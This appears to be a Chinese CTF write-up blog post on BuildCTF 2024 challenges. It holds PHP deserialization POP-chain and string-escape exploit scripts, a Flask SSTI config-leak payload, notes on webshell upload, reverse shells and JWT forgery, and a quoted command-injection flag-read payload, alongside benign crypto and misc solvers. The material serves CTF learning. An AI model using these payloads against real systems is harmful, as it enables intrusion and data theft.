首页 > 其他分享 >BuildCTF

BuildCTF

时间:2024-10-30 19:01:44浏览次数:1  
标签:AES keys BuildCTF flag cipher print import

主要做web方向,misc和crypto有几题也看了一下

Web

ez!http

ez_md5

这里的<font style="background-color:rgb(249, 242, 244);">$_REQUEST</font>变量获得GET或POST的参数,值的注意的是,如果通过不同的方式获得相同变量的不同值,**<font style="background-color:rgb(249, 242, 244);">$_REQUEST</font>**变量只会获得最后传入的那个参数的值

我这谷歌hackbar发包有点问题,这里就可以

robots.txt知道了前几位,直接爆破md5,一下就爆破了

还有传参Build[CTF.com,参数名问题了

find-the-id

直接爆破即可

babyupload

上传.htaccess文件

上传木马

LovePopChain

pop链

<?php

class MyObject{
    public $NoLove;
    public $Forgzy;

}

class GaoZhouYue{
    public $Yuer;
    public $LastOne;

}

class hybcx{
    public $JiuYue;
    public $Si;

}
$a = new MyObject();
$b = new GaoZhouYue();
$c = new hybcx();
$a->NoLove = $c;
$c->Si = $a;
$a->Forgzy = $c;



echo urlencode(serialize($a));

Why_so_serials?

字符串逃逸

<?php

function filter($str)
{
    return str_replace('joker', 'batman',$str);
}
class Gotham{
    public $Bruce;
    public $Wayne = 'jokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjoker";s:5:"crime";b:1;}';
    public $crime=true;
//    public function __construct($Bruce,$Wayne){
//        $this->Bruce = $Bruce;
//        $this->Wayne = $Wayne;
//    }
}
$a = new Gotham();
$b =  serialize($a);
echo $b;
echo filter($b);
//echo fileter(serialize($a));

tflock

扫描目录,得到admin的密码本和普通用户ctfer 123456

普通用户ctfer一直发包

再登admin就不会有锁进行爆破得到

RedFlag

buuctf-shrine

当config,self,( ) 都被过滤的时候,为了去获得讯息,必须去读一些全局变量。

如何绕过waf ? url_for 调取 current_app

url_for,在它引用的内容中,有着 current_app 的全局变量

{{url_for.globals['current_app'].config}}

eazyl0gin

toUpperCase() / toLowerCase()

特殊字符

'ı'.toUpperCase()='I''ſ'.toUpperCase()='S''K'.toLowerCase()='k'

buildctf中i用这个特殊字符替代

md5直接解密密码即可

刮刮乐

bash里写入反弹shell

9002端口开放http服务

ez_waf

只对内容检查

填充垃圾数据可以绕过

蚁剑连接即可

sub

jwt伪造

访问page页面,file参数拼接命令rce

Misc

Hex的秘密

题目给出的字符串确实是16进制的,但每个16进制都是大于 <font style="background-color:rgb(255, 245, 245);">7F</font> 的,换算成10进制就是都大于 <font style="background-color:rgb(255, 245, 245);">127</font> 的,于是我们让每个16进制 都减去128 再用ASCII解密

#!/usr/bin/python3

s = 'c2f5e9ece4c3d4c6fbb3c5fafadfc1b5e3a1a1dfe2e9eee1f2f9f9f9fd'
ls = [ chr(int(f"{s[i]}{s[i+1]}",16)-128) for i in range(0,len(s),2) ]
print(''.join(ls))

有黑客

查看流量包哥斯拉流量,推断XOR密钥,依次分析upload/shell.php的后几个包

拖进cypherchef

什么?来玩玩心算吧

parselmouth-master工具

python沙箱逃逸

Crypto

mitm

中间相遇攻击

明密文分别两次加密两次解密

from Crypto.Util.number import *
from Crypto.Util.Padding import *
from hashlib import sha256
from Crypto.Cipher import AES
from random import *
from secret import flag

note = b'Crypt_AES*42$@'
r = 4
keys = []

for i in range(r):
    key = bytes(choices(note, k=3))
    print(key)
    print(sha256(key).digest())
    keys.append(sha256(key).digest())
print(keys)

leak = b'Hello_BuildCTF!!'
cipher = leak
for i in range(r):
    cipher = AES.new(keys[i], AES.MODE_ECB).encrypt(cipher)

enc_key = sha256(b"".join(keys)).digest()
enc_flag = AES.new(enc_key, AES.MODE_ECB).encrypt(pad(flag, AES.block_size))

print(f'cipher = {cipher}')
print(f'enc_flag = {enc_flag}')
# cipher = b'\xb9q\x04\xa3<\xf0\x11-\xe9\xfbo:\x9aQn\x81'
# enc_flag = b'q\xcf\x08$%\xb0\x86\xee\x1a(b\x7f\xf8\x86\xbd\xd0\xa7\xee\xd9\x9d2\x82a7H=a\x13\x87e\xad\xd2b\x8e\x07\xa5\xddo\xc0\xf3N\xd4b\xc9o\x88$\xc7\xf4p\xc1\x1e,\xed\xcc\x94\x8c\xf4\x00\xa5\xe0-\xf7\xc5'
from Crypto.Util.number import *
from itertools import product
from Crypto.Util.Padding import *
from hashlib import sha256
from Crypto.Cipher import AES
from tqdm import tqdm
from random import choices

note = b'Crypt_AES*42$@'
key_length = 3

# Generate all possible keys of the specified length
all_keys = [bytes(p) for p in product(note, repeat=key_length)]
key_pairs = [[sha256(key1).digest(), sha256(key2).digest()] for key1 in all_keys for key2 in all_keys]

r = 2
ciphers = []
cipher_keys = []  


for keys in tqdm(key_pairs, desc="Encrypting"):
    leak = b'Hello_BuildCTF!!'
    cipher = leak
    for i in range(r):
        cipher = AES.new(keys[i], AES.MODE_ECB).encrypt(cipher)
    ciphers.append(cipher)
    cipher_keys.append(keys) 

plains = []
plain_keys = []  

for keys in tqdm(key_pairs, desc="Decrypting"):
    cipher2 = b'\xb9q\x04\xa3<\xf0\x11-\xe9\xfbo:\x9aQn\x81'
    plain = cipher2
    for i in range(r):
        plain = AES.new(keys[i], AES.MODE_ECB).decrypt(plain)
    plains.append(plain)
    plain_keys.append(keys)

common = set(plains) & set(ciphers)

for item in common:
    index_plain = plains.index(item)
    index_cipher = ciphers.index(item)

    print(f'Common Item: {item}')
    print(f'Keys for Plain: {plain_keys[index_plain]}')
    print(f'Keys for Cipher: {cipher_keys[index_cipher]}')
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from hashlib import sha256

# Assume these values are known
keys = [b'T\xeb\x9f13\xa7w\x1ft`\x8e\xd5v\x80\xd8\x89\xf3\xf4-\xd7\xc2,\xec\x00\x85\x1b\xdd\x06\x1e\xce\xbe\x99', b'\xae\xe7\xc3\xff&k\x15\xc5Q\x89HD.\xb3\xb3\x83\x11:\xd2\x1e\x04\xfc\xb1\x00\x03DQ\x1eF\xc4r^', b'\xf0\xb6\x8c\x1f\x85\x9f\x1a\xff\xe7\xd1r\x9a\x0c\xf3\xc7"\x159+\x85\xc5\xc6\xe0\x9ef\x13\xd1\xf2\x9c\xb2B\xdf', b'%\x99f\x8f/\x93\x84X)\x8e\xfd\xb6(\x1f^>\xaf\xcd\xd4\xf3\xc0\xc2\x15\xef \x83X\xd6\x02\xa8~\x11']
enc_key = sha256(b"".join(keys)).digest()
enc_flag = b'q\xcf\x08$%\xb0\x86\xee\x1a(b\x7f\xf8\x86\xbd\xd0\xa7\xee\xd9\x9d2\x82a7H=a\x13\x87e\xad\xd2b\x8e\x07\xa5\xddo\xc0\xf3N\xd4b\xc9o\x88$\xc7\xf4p\xc1\x1e,\xed\xcc\x94\x8c\xf4\x00\xa5\xe0-\xf7\xc5'  # Your actual encrypted flag here

cipher = AES.new(enc_key, AES.MODE_ECB)

decrypted_data = cipher.decrypt(enc_flag)

try:
    flag = unpad(decrypted_data, AES.block_size)
    print(f'Decrypted flag: {flag.decode()}')  
except ValueError:
    print("Incorrect decryption, possibly due to padding error.")

girls_band_cry_pto

参考:

六校梦幻联赛Crypto-CSDN博客

题目:

from Crypto.Util.number import *
import gmpy2


def getprime(kbit,FLAG):
    a = getPrime(kbit)
    b = getPrime(kbit)
    N = getPrime(kbit+5)
    seed = getPrime(kbit)
    t = seed
    list_t = []
    for i in range(10):
        t = (a*t+b)%N
        list_t.append(t)
    if FLAG:
        print(list_t)
    return seed



p = getprime(512,1)
q = getprime(512,0)
flag = b'...'
flag = bytes_to_long(flag)
n = p*q
e = 1384626

assert flag.bit_length() < n.bit_length()//2

c = pow(flag,e,n)

print('c=',c)

''''''
[37382128984932009103055100236038298684187701771245912912208816283882352432386956435965036367810667394024993955812239704879381327228911265588017046627348503, 78860822396220922181257740301787328387654351181949135165584053897837116358564567613593406267620270397593757280733139576593428399156673217202739776358215953, 71961258377748802736482119449608198361898650603044501972923193831637292104436919483148544126546157761435847502622416800596454167412705966674707485447149592, 87271087644907910379168026089161507515679859469787715709089631773745967695993043069981508275969979669395420678260957179827954920361899134388830957711827969, 72060448202158281754256475874109091993193239479491265267010728401711694585210195554635415348891139571830347004379216450772696235700910532153698412887476412, 198822737610698203376629161658629276556973499054887457432530950247888991546498594767954251786997515337433684733300663470799887569646159225800449429896258899, 186920895499932700150962847893153648403293237986492275627558112493385728113172211076262656795948951216023567806119078906412693819469136004563793414149643278, 56472634592713718635518027850351194341092172882542912776939953869983486542308422043454035086533070566859787384014556343587278097326244663175874047755695694, 42665120723108982921319232615099077060109901818313520605789700720605479528247045699344736360219784997528870841912999130951916510491705708498185762196467897, 205629005887807114384057131575309344114082007367662384600399313743755704623421415135564859072125246431180953419843187244789534372794288258609006920825136808]
c= 51846448616255629242918159354807752786692784645460532308823434086479848425723111371477823327980874708898952566998637230358105087254392989515438172155717708590176244736140994735777168368143405720703501031813936741444894000217727880068767785957507824708838189619286341612305393812568642372035793481458142583420
''''''

先求p,根据题目给的函数可知,p是LCG的原始seed

from Crypto.Util.number import *
from sympy import isprime

def gcd(a, b):
    if (b == 0):
        return a
    else:
        return gcd(b, a % b)


s = [37382128984932009103055100236038298684187701771245912912208816283882352432386956435965036367810667394024993955812239704879381327228911265588017046627348503, 78860822396220922181257740301787328387654351181949135165584053897837116358564567613593406267620270397593757280733139576593428399156673217202739776358215953, 71961258377748802736482119449608198361898650603044501972923193831637292104436919483148544126546157761435847502622416800596454167412705966674707485447149592, 87271087644907910379168026089161507515679859469787715709089631773745967695993043069981508275969979669395420678260957179827954920361899134388830957711827969, 72060448202158281754256475874109091993193239479491265267010728401711694585210195554635415348891139571830347004379216450772696235700910532153698412887476412, 198822737610698203376629161658629276556973499054887457432530950247888991546498594767954251786997515337433684733300663470799887569646159225800449429896258899, 186920895499932700150962847893153648403293237986492275627558112493385728113172211076262656795948951216023567806119078906412693819469136004563793414149643278, 56472634592713718635518027850351194341092172882542912776939953869983486542308422043454035086533070566859787384014556343587278097326244663175874047755695694, 42665120723108982921319232615099077060109901818313520605789700720605479528247045699344736360219784997528870841912999130951916510491705708498185762196467897, 205629005887807114384057131575309344114082007367662384600399313743755704623421415135564859072125246431180953419843187244789534372794288258609006920825136808]

t = []
for i in range(9):
    t.append(s[i] - s[i - 1])
all_n = []
for i in range(7):
    all_n.append(gcd((t[i + 1] * t[i - 1] - t[i] * t[i]), (t[i + 2] * t[i] - t[i + 1] * t[i + 1])))

MMI = lambda A, n, s=1, t=0, N=0: (n < 2 and t % N or MMI(n, A % n, t, s - A // n * t, N or n), -1)[n < 1]  # 逆元计算
for n in all_n:
    n = abs(n)
    if n == 1:
        continue
    a = (s[2] - s[1]) * MMI((s[1] - s[0]), n) % n
    ani = MMI(a, n)
    b = (s[1] - a * s[0]) % n
    seed = (ani * (s[0] - b)) % n
    plaintext = seed


if isprime(seed):
    print(f"Found prime p: {seed}")
else:
    print(f"Seed is not prime: {seed}")

print(seed)

# 1306971501389667405355339984446001963306823960180518559102900074209906822479823648175928437467992667758988690268887352531564749276373500569799174613448137062
from Crypto.Util.number import *
import gmpy2

# 已知参数
p = 1306971501389667405355339984446001963306823960180518559102900074209906822479823648175928437467992667758988690268887352531564749276373500569799174613448137062
c = 51846448616255629242918159354807752786692784645460532308823434086479848425723111371477823327980874708898952566998637230358105087254392989515438172155717708590176244736140994735777168368143405720703501031813936741444894000217727880068767785957507824708838189619286341612305393812568642372035793481458142583420
e = 1384626

d = gmpy2.invert(e, p - 1)

m = pow(c, d, p)

flag = long_to_bytes(m)
print(flag)

if b'BuildCTF' in flag:
    print(flag)

BuildCTF{crypt0_15_s0_e@5y!}

标签:AES,keys,BuildCTF,flag,cipher,print,import
From: https://www.cnblogs.com/1nnya/p/18516386

相关文章

  • BuildCTF2024 Web
    ez!httphttp的各种头部字段伪造,无需多言.find-the-id生成一个1~很大的字典去爆破我写的网站被rce了?命令注入,payload为|nl${IFS}/f[k-m]ag||babyupload有meme检测,扩展名应该是白名单.传个htaccess上去,然后传个伪造了文件头的马.还对马里面的内容进行了检测,绕的彻底一......
  • BuildCTF 2024 Writeup - by 涉海蜉蝣
    BuildCTF2024Writeup-by涉海蜉蝣MiscEZ_ZIP-bysorin010查找分析发现压缩包,使用foremost分离疑似套娃压缩包,使用开源软件extractnow或者脚本都可以批量压缩,这里使用extractnow得到flagHEX的秘密-bysorin16进制每两位截取一次转10进制,对比Build的前几个字符......
  • BuildCTF2024-Crypto
    差一题古典不想看了,其他方向就不献丑了CryptoOVO开门爽!开到南天门了兄弟fromCrypto.Util.numberimport*flag=b'BuildCTF{******}'#随机生成p,qp=getPrime(1024)q=getPrime(1024)#计算模数nn=p*qe=65537m=bytes_to_long(flag)#c=m^e%nc=pow(......
  • BuildCTFwp
    自己本次比赛负责reverse,misc,crypto方向,web和pwn就不写了MiscFindYourWindows告诉了key文件,应该是磁盘类的题,用veracrypt解决提示桌面有问题,改成zip文件看看BuildCTF{I2t_s0_e5sy!!!}四妹?还是萍萍呢?fromPILimportImageimportqrcodedefstitch_images(image_pat......